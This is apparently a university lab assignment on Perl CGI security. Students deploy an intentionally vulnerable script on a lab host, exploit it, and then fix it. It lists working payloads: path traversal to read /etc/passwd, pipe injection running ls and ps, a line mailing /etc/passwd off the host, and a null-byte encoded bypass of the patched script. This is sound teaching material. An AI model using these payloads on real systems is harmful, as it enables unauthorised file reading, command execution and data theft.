Assignments of day 1 in week #3

CGI exploit

Understand the Perl CGI exploit

1. At your host, cd /home/httpd

2. tar zxvf /usr/local2/wsh/cgi/demo.tar.gz
   After the tar command, you should have the following files under the /home/httpd directory
   

   data/1.db
   data/2.db
   data/3.db
   cgi-bin/printdata1.cgi
   cgi-bin/printdata2.cgi
   html/query_data.html
   

3. cp cgi-bin/printdata1.cgi cgi-bin/printdata.cgi

4. Now browse the following URL
   http://your_host.wsh.hkntec.net/query_data.html

   This is a simple form to print the input filename data. In the form, you may enter "1.db", "2.db" or "3.db" to view file content of these files

5. Now try to type the following inputs in the form and observe the outputs of these inputs

   ../../../etc/passwd
   ../../../etc/inetd.conf
   ../../../bin/ls /etc|
   ../../../bin/ps -ef|
   ../../../bin/cat /etc/passwd|/bin/mail your_email|
   

6. cp cgi-bin/printdata2.cgi cgi-bin/printdata.cgi

   Type diff cgi-bin/printdata1.cgi cgi-bin/printdata2.cgi to see the difference of these two programs. printdata2.cgi has been modified to check the exist of input file.

7. Now try the inputs in step 5 again and observe the outputs of these inputs. Compare these outputs with the ones in step 5

8. Now try following URL:

   http://your_host.wsh.hkntec.net/cgi-bin/printdata.cgi?filename=..%2F..%2F..%2Fbin%2Fps%00%7C

   Why this URL can get around the refined printdata.cgi program?

9. Rectify the printdata.cgi so as to get rid of the above exploits

10. Put all your findings, including how to rectify the printdata.cgi, on your web pages.

References:

• Read the man page of the above commands
• Phrack 55: Perl CGI problems

• PERL/CGI HACKING

• Phrack 49: CGI Security Holes